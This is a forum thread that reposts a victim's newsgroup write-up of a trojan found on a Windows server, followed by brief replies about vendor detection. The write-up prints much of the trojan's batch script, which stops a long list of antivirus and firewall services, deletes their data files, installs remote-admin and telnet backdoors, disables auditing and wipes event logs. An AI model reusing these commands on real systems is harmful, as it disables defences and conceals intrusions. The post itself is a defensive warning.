Jump to content
Compatible Support Forums
Sign in to follow this  
Followers 0
kfarmer

VERY NASTY TROJAN -- SARC refuses to recognize it (long)

By kfarmer, in Security

Recommended Posts

kfarmer    0

kfarmer
Posted

From kfarmer@thuban.org (Keith Farmer)

Newsgroups alt.comp.virus

Subject VERY NASTY TROJAN -- SARC refuses to recognize it (long write-up)

NNTP-Posting-Host 67.126.144.68

Message-ID <6d668d6.0306031252.1e301208@posting.google.com>

 

SARC refuses to recognize this as a threat. So I'm spreading this where I may

 

Just spent the day reinstalling a server. NAV missed one. Not merely that, but when brought to SARC's attention, they dismissed it.

They're losing a customer over this.

 

Turns out we had a backdoor hacked onto our system. Considering the system was fairly newly installed, we don't know if it got in through a WebDAV flaw or not, before the appropriate patches were installed.

Either way, here's what it did

 

1) installed a hacked copy of the Serv-U ftp server.

 

This seems to contain a dictionary. Why would an ftp server contain a dictionary? SARC seems to think nothing of it.

 

2) created and REALLY REALLY LOCKED a couple directories to be used as dumping points for dvd rips. Administrator couldn't even change the access control.

 

3) replaced my system32/services.exe file with a hacked version.

 

If you bother to open the modified services.exe file in a bytecode editor (such as UltraEdit, something with SARC apparently didn't bother with), you see the following, at the very beginning -- "Use Win32 instead dumpass haha rofl!" and, at the end, "idontlikethosenastyavproggiesbelievemeidontlikethem" (repeats omitted). The legitimate file from Microsoft contains none of this.

It took us less than a minute to find these, as we're not the ones trained in it.

 

For some reason, SARC doesn't seem to think this is a sign that something's been altered in a system file. Obviously, someone at SARC is not doing their job.

 

4) installed MOAB.BAT and .EXE.

 

For some reason, attempts to forward this to SARC are failing. I wonder if they blocked my account. I'm certainly not going to pay for a phone call to their tech support just because they refused to listen to me. I'll just give my business elsewhere in that case. Hence, this posting.

 

5) Modified registry security, policy, you name it. For this reason alone, we reformatted and reinstalled.

 

6) Ports to watch out for, surprise surprise, include port 1337, as well as 2277 (a remote admin backdoor), and 539 (dec or hex, I don't know).

 

7) It will stop and/or delete the following AV and firewall services

 

_Avp32.exe /y

_Avpcc.exe /y

_Avpm.exe /y

Ackwin32.exe /y

Agnitum Outpost Firewall /y

Anti-Trojan.exe /y

ANTIVIR /y

Apvxdwin.exe /y

ATRACK /y

Autodown.exe /y

AVCONSOL /y

Avconsol.exe /y

Ave32.exe /y

Avgctrl.exe /y

Avkserv.exe /y

Avnt.exe /y

Avp.exe /y

AVP.EXE /y

AVP32 /y

Avp32.exe /y

Avpcc.exe /y

Avpdos32.exe /y

Avpm.exe /y

Avptc32.exe /y

Avpupd.exe /y

Avsched32.exe /y

AVSync Manager /y

AVSYNMGR /y

Avwin95.exe /y

Avwupd32.exe /y

Blackd.exe /y

BLACKICE /y

BlackICE Defender /y

Blackice.exe /y

CA Sessionwall-3 /y

Cfiadmin.exe /y

Cfiaudit.exe /y

CFINET /y

Cfinet.exe /y

CFINET32 /y

Cfinet32.exe /y

Claw95.exe /y

Claw95cf.exe /y

Cleaner.exe /y

Cleaner3.exe /y

ConSeal PC Firewall & Private Desktop /y

Defwatch /y

Defwatch.exe /y

Dvp95.exe /y

Dvp95_0.exe /y

Ecengine.exe /y

eSafe Protect Desktop /y

Esafe.exe /y

Espwatch.exe /y

eTrust EZ Firewall /y

F-Agnt95.exe /y

Findviru.exe /y

Fprot.exe /y

F-Prot.exe /y

F-PROT95 /y

F-Prot95.exe /y

FP-WIN /y

Fp-Win.exe /y

Freedom 2 /y

Frw.exe /y

F-STOPW /y

F-Stopw.exe /y

GNAT Box Lite /y

IAMAPP /y

Iamapp.exe /y

Iamserv.exe /y

Ibmasn.exe /y

Ibmavsp.exe /y

Icload95.exe /y

Icloadnt.exe /y

ICMON /y

Icmon.exe /y

Icsupp95.exe /y

Icsuppnt.exe /y

Iface.exe /y

Internet Alert 99 /y

IOMON98 /y

Iomon98.exe /y

Jedi.exe /y

LOCKDOWN2000 /y

Lockdown2000.exe /y

Look'n'Stop /y

Look'n'Stop Lite /y

Lookout.exe /y

LUALL /y

Luall.exe /y

LUCOMSERVER /y

MCAFEE /y

McAfee Firewall /y

McAfee Internet Guard Dog Pro /y

Moolive.exe /y

Mpftray.exe /y

N32scanw.exe /y

NAVAPSVC /y

NAVAPW32 /y

Navapw32.exe /y

NAVLU32 /y

Navlu32.exe /y

Navnt.exe /y

NAVRUNR /y

NAVW32 /y

Navw32.exe /y

NAVWNT /y

Navwnt.exe /y

NeoWatch /y

NISSERV /y

NISUM /y

Nisum.exe /y

NMAIN /y

Nmain.exe /y

Norman Personal Firewall /y

Normist.exe /y

NORTON /y

Norton AntiVirus Server /y

Norton Internet Security /y

Norton Personal Firewall 2001 /y

Nupgrade.exe /y

NVC95 /y

Nvc95.exe /y

Outpost.exe /y

Padmin.exe /y

Pavcl.exe /y

Pavsched.exe /y

Pavw.exe /y

Pc firewall /y

PC Viper /y

PCCIOMON /y

PCCMAIN /y

PCCWIN98 /y

Pccwin98.exe /y

Pcfwallicon.exe /y

Persfw.exe /y

PGP Gauntlet /y

POP3TRAP /y

Proxy + /y

PVIEW95 /y

Rav7.exe /y

Rav7win.exe /y

Rescue.exe /y

RESCUE32 /y

SAFEWEB /y

Safeweb.exe /y

Scan32.exe /y

Scan95.exe /y

Scanpm.exe /y

Scrscan.exe /y

Serv95.exe /y

Smc.exe /y

SMCSERVICE /y

Snort - Win32 GUI /y

Snort (Intrusion Detection System) /y

Sphinx.exe /y

Sphinxwall /y

Sweep95.exe /y

Sybergen Secure Desktop /y

Sybergen SyGate /y

SYMPROXYSVC /y

Tbscan.exe /y

Tca.exe /y

Tds2-98.exe /y

Tds2-Nt.exe /y

TermiNET /y

TGBBOB /y

Tiny Personal Firewall /y

Vet95.exe /y

Vettray.exe /y

Vscan40.exe /y

Vsecomr.exe /y

VSHWIN32 /y

Vshwin32.exe /y

VSSTAT /y

Vsstat.exe /y

WEBSCANX /y

Webscanx.exe /y

WEBTRAP /y

Wfindv32.exe /y

Wingate /y

WinProxy /y

WinRoute /y

WyvernWorks Firewall /y

Zonealarm /y

Zonealarm.exe /y

AVP32 /y

LOCKDOWN2000 /y

AVP.EXE /y

CFINET32 /y

CFINET /y

ICMON /y

SAFEWEB /y

WEBSCANX /y

ANTIVIR /y

MCAFEE /y

NORTON /y

NVC95 /y

FP-WIN /y

IOMON98 /y

PCCWIN98 /y

F-PROT95 /y

F-STOPW /y

PVIEW95 /y

NAVWNT /y

NAVRUNR /y

NAVLU32 /y

NAVAPSVC /y

NISUM /y

SYMPROXYSVC /y

RESCUE32 /y

NISSERV /y

ATRACK /y

IAMAPP /y

LUCOMSERVER /y

LUALL /y

NMAIN /y

NAVW32 /y

NAVAPW32 /y

VSSTAT /y

VSHWIN32 /y

AVSYNMGR /y

AVCONSOL /y

WEBTRAP /y

POP3TRAP /y

PCCMAIN /y

PCCIOMON /y

del c\*ANTI-VIR*.DAT /s

del c\*CHKLIST*.DAT /s

del c\*CHKLIST*.MS /s

del c\*CHKLIST*.CPS /s

del c\*CHKLIST*.TAV /s

del c\*IVB*.NTZ /s

del c\*SMARTCHK*.MS /s

del c\*SMARTCHK*.CPS /s

del c\*AVGQT*.DAT /s

del c\*AGUARD*.DAT /s

 

8) other associated files

 

attrib +s CommonDlg32.dll

attrib +s drvrquery32.exe

attrib +s clearlogs.exe

attrib +s script.exe

attrib +s auditpol.exe

attrib +s PSKILL.exe

attrib +s REG.exe

attrib +s TLIST.exe

attrib +s uptime.exe

attrib +s SystemInfo.exe

 

del /s winmgnt.exe

del /s servudaemon.exe

del /s servudaemon.ini

copy %windir%\drvrquery32.exe %windir%\system32\ /y

copy %windir%\CommonDlg32.dll %windir%\system32\ /y %windir%\system32\drvrquery32.exe /s %windir%\system32\drvrquery32.exe /h %windir%\system32\drvrquery32.exe /i md %windir%\system32\backup copy %windir%\system32\CommonDlg32.dll %windir%\system32\backup copy %windir%\system32\drvrquery32.exe %windir%\system32\backup

 

echo Windows Registry Editor Version 5.00 > protect.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]

>> protect.reg

echo "DisableWebDAV"=dword00000001 >> protect.reg

regedit /s protect.reg

reg.exe IMPORT protect.reg

del protect.reg

 

net stop R_Server

regedit /s radmin.reg

nvsvc.exe /install /silence

net start R_Server

 

echo Windows Registry Editor Version 5.00 > config.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> config.reg echo "NTLM"=dword00000000 >> config.reg echo "TelnetPort"=dword00000539 >> config.reg regedit.exe /s config.reg del config.reg net start telnet

 

auditpol /disable

del c\*.log /s

del d\*.log /s

clearlogs -app

clearlogs -sys

clearlogs -sec

 

md %windir%\system32\spool\Help\

md %windir%\system32\spool\Help\aux\ \

md %windir%\system32\spool\Help\aux\.tmp\

md %windir%\system32\spool\Help\aux\.tmp\scanfolder

md %windir%\system32\spool\Help\aux\.tmp\warez

cacls %windir%\system32\spool\Help\* /T /E /P AdministratorN attrib +S +H %windir%\system32\spool\Help\aux\.tmp\ /S /D copy login.txt %windir%\system32\spool\Help\aux\.tmp\

 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]

>> bp.reg

echo "AutoShareServer"=dword00000000 >> bp.reg

echo "AutoShareWks"=dword00000000 >> bp.reg

regedit /s bp.reg

reg.exe IMPORT bp.reg

del bp.reg

Share this post

Link to post

kfarmer    0

kfarmer
Posted

Sophos had already identified the trojan in question. CA, Kaspersky, and F-Secure also found it. All are up[censored] their signature files.

 

No comment from the people at SARC.

Share this post

Link to post

Mr.Guvernment    0

Mr.Guvernment
Posted

does not sound like a back door , could very well be - i really dont know much about this..lol

 

- sound like someone used some other flaw in some application as u said and force hacked their way in...?? via IIS or SQL or and SSH flaw?

 

i know some people who can do this and from what they have explained it is not overly difficult if the system is no locked down tight.

 

 

i can PM u some links for some info.

Share this post

Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
Followers 0
Go To Topic Listing Security
×